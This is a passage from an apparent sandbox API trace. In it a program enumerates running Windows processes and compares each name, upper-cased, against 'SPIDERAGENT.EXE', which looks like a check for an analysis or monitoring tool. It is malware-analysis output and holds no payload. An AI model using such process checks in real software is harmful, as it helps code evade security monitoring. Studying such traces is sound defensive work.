(lpString="audiodg.exe") returned 11 [0163.414] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.414] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.414] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.414] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.414] lstrlenW (lpString="svchost.exe") returned 11 [0163.414] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.414] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.414] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.415] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.415] lstrlenW (lpString="svchost.exe") returned 11 [0163.415] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.415] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.415] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.416] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.416] lstrlenW (lpString="spoolsv.exe") 
returned 11 [0163.416] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.416] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.416] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.417] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.417] lstrlenW (lpString="svchost.exe") returned 11 [0163.417] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.417] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.417] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.417] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.417] lstrlenW (lpString="taskhost.exe") returned 12 [0163.417] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.417] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.417] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.418] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.418] lstrlenW (lpString="taskeng.exe") returned 11 [0163.418] 
CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.418] lstrcmpW (lpString1="TASKENG.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.418] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.419] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.419] lstrlenW (lpString="dwm.exe") returned 7 [0163.419] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.419] lstrcmpW (lpString1="DWM.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.419] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.420] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.420] lstrlenW (lpString="explorer.exe") returned 12 [0163.420] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.420] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.420] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.420] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.420] lstrlenW (lpString="taskeng.exe") returned 11 [0163.420] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb 
| out: lpsz="TASKENG.EXE") returned 0xb [0163.420] lstrcmpW (lpString1="TASKENG.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.420] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.421] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.421] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.421] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.421] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.421] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.422] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.422] lstrlenW (lpString="taskhost.exe") returned 12 [0163.422] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.422] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.422] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.423] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.423] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.423] CharUpperBuffW 
(in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.423] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.423] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.423] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.423] lstrlenW (lpString="tri.exe") returned 7 [0163.423] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.423] lstrcmpW (lpString1="TRI.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.423] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.424] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.424] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.424] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.424] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.424] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.425] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" 
[0163.425] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.425] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.425] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.425] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.426] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.426] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.426] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.426] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.426] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.426] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.426] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.426] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.426] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.426] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.427] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.427] lstrlenW (lpString="isolation.exe") returned 13 [0163.427] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.427] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.427] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.428] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.428] lstrlenW (lpString="abc.exe") returned 7 [0163.428] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.428] lstrcmpW (lpString1="ABC.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.428] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.428] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.428] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.429] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.429] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.429] Process32NextW (in: 
hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.429] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.429] lstrlenW (lpString="english_performing.exe") returned 22 [0163.429] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.429] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.429] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.430] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.430] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.430] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.430] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.430] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.431] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.431] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.431] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", 
cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.431] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.431] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.431] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.431] lstrlenW (lpString="volume.exe") returned 10 [0163.431] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.431] lstrcmpW (lpString1="VOLUME.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.431] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.432] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.432] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.432] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.432] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.432] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.433] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.433] lstrlenW 
(lpString="objectives-bailey-audit.exe") returned 27 [0163.433] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.433] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.433] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.434] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.434] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.434] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.434] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.434] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.434] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.434] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.434] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.434] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.434] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.435] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.435] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.435] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.435] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.435] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.436] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.436] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.436] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.436] lstrcmpW (lpString1="EXCEL.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.436] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.437] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.437] lstrlenW (lpString="svchost.exe") returned 11 [0163.437] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.437] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.437] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: 
lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.438] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.438] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.438] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.438] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.438] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.439] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.439] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.439] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.439] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.439] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.440] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.440] lstrlenW (lpString="svchost.exe") returned 11 [0163.440] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.440] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.440] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.441] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.441] lstrlenW (lpString="svchost.exe") returned 11 [0163.441] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.441] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.441] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.442] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.442] lstrlenW (lpString="winpoint.exe") returned 12 [0163.442] 